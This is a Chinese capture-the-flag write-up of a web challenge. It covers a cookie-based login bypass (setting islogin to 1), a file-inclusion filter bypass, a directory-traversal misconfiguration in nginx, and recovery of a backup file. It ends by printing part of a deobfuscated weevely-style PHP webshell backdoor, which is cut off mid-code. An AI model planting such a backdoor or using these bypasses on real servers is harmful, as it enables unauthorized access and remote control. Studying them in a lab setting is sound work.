打开题目链接
出现了个登陆界面,随便试着登一下
提示网站建设中,以为是sql注入,结果全是提示这玩意
看一下robots.txt
挨个访问一下
hint.php给了一个文件路径,可能是文件包含方面的
但是Hack.php自动跳转到登陆界面,题目不可能给没用的,抓包看一下
将islogin改成1,就成为登陆状态,然后放包
除了管理中心以外,其他的点击会跳转到登陆界面
那就看一下这个管理中心
url出现新的路径,如果admin访问正常,会please continue
那么file,和ext文件扩展名,会不会是文件包含漏洞
试一下,发现…/被过滤了
emmmm,测试一下
想到双写,但半天没弄出来,看下大佬的payload
读取到 /etc/nginx/sites-enabled/site.conf 配置文件
审计代码
在 url访问 /web-img , 就会访问系统根目录下的 /images/
嗯,一个目录遍历漏洞
遍历目录 , 在 /var/www 下能找到 hack.php.bak
下载下来,发现一堆乱码
看下wp,也不太懂php混肴后门还是weevely 生成的 WebShell 后门 。。。
echo $f 得到
<?php
$kh="42f7";
$kf="e9ac";
function x($t,$k) {
$c=strlen($k);
$l=strlen($t);
$o="";
for ($i=0;$i<$l;) {
for ($j=0;($j<$c&&$i<$l);$j++,$i++) {
$o.=$t {
$i
}
^$k {
$j
}
;
}
}
return $o;
}
$r=$_SERVER;
$rr=@$r["HTTP_REFERER"];
$ra=@$r["HTTP_ACCEPT_LANGUAGE"];
if($rr&&$ra) {
$u=parse_url($rr);
parse_str($u["query"],$q);
$q=array_values($q);
preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);
if($q&&$m) {
@session_start();
$s=&$_SESSION;
$ss="substr";
$sl="strtolower";
$i=$m[1][0].$m